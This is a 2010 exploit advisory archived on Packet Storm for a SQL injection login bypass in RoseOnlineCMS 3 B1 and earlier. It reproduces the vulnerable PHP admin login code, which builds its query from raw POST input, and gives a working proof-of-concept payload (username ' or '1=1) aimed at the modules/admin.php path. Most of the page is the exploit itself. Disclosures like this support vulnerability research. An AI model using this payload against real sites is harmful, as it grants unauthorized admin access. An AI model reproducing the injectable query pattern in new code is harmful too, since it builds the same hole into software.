what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

RoseOnlineCMS 3 B1 SQL Injection

RoseOnlineCMS 3 B1 SQL Injection
Posted Jan 17, 2010
Authored by cr4wl3r

RoseOnlineCMS versions 3 B1 and below suffer from a remote SQL injection vulnerability that allows for authentication bypass.

tags | exploit, remote, sql injection, bypass
SHA-256 | 671a405c374ea19156b88d934a20e0c78bbb1bf334ad7e7253d834cd538695db

RoseOnlineCMS 3 B1 SQL Injection

Change Mirror Download
                            \#'#/
(-.-)
--------------------oOO---(_)---OOo-------------------
| RoseOnlineCMS <= 3 B1 Remote Login Bypass Exploit |
| (works only with magic_quotes_gpc = off) |
------------------------------------------------------

[!] Discovered: cr4wl3r <cr4wl3r[!]linuxmail.org>
[!] Download: http://sourceforge.net/projects/rosecms/files/
[!] Date: 16.01.2010
[!] Remote: yes

[!] Code :


<form action="<?php $PHP_SELF; ?>" method="post">

<div align="center">
<table width="295" border="0">
<tr>
<td width="64">Username:</td>
<td width="215">
<label>
<input name="user" type="text" id="user">
</label> </td>
</tr>
<tr>
<td>Password:</td>
<td> <input name="pass" type="text" id="pass"> </td>
</tr>
</table>
</div>
<p align="center">
<em>
<input name="submit" type="submit" id="submit" value="Login">
</em>
</form>
</p>
<?php
if(isset($_POST['submit'])) {


// username and password sent from signup form
$USER = $_POST['user'];
$PASS = md5($_POST['pass']);

$sql = "SELECT * FROM `accounts` WHERE username='$USER' and password='$PASS' and accesslevel = '300'";
$result = mysql_query($sql);

// Mysql_num_row is counting table row
$count = mysql_num_rows($result);
// If result matched $myusername and $mypassword, table row must be 1 row

if($count == 1){
// Register $user, $pass and redirect to file ?op=admin
session_register("USER");
session_register("PASS");
echo('Logged in: <a href=?op=admincp>Click here</a> to go to the control panel.');
}
else {
echo "You are banned, or you are an user with no permission to enter.";
}
}
?>

[!] PoC: [RoseOnlineCMS_path]/modules/admin.php

username : ' or '1=1
password : cr4wl3r
Login or Register to add favorites

File Archive:

October 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Oct 1st
    39 Files
  • 2
    Oct 2nd
    23 Files
  • 3
    Oct 3rd
    18 Files
  • 4
    Oct 4th
    20 Files
  • 5
    Oct 5th
    0 Files
  • 6
    Oct 6th
    0 Files
  • 7
    Oct 7th
    17 Files
  • 8
    Oct 8th
    66 Files
  • 9
    Oct 9th
    25 Files
  • 10
    Oct 10th
    20 Files
  • 11
    Oct 11th
    21 Files
  • 12
    Oct 12th
    0 Files
  • 13
    Oct 13th
    0 Files
  • 14
    Oct 14th
    0 Files
  • 15
    Oct 15th
    0 Files
  • 16
    Oct 16th
    0 Files
  • 17
    Oct 17th
    0 Files
  • 18
    Oct 18th
    0 Files
  • 19
    Oct 19th
    0 Files
  • 20
    Oct 20th
    0 Files
  • 21
    Oct 21st
    0 Files
  • 22
    Oct 22nd
    0 Files
  • 23
    Oct 23rd
    0 Files
  • 24
    Oct 24th
    0 Files
  • 25
    Oct 25th
    0 Files
  • 26
    Oct 26th
    0 Files
  • 27
    Oct 27th
    0 Files
  • 28
    Oct 28th
    0 Files
  • 29
    Oct 29th
    0 Files
  • 30
    Oct 30th
    0 Files
  • 31
    Oct 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close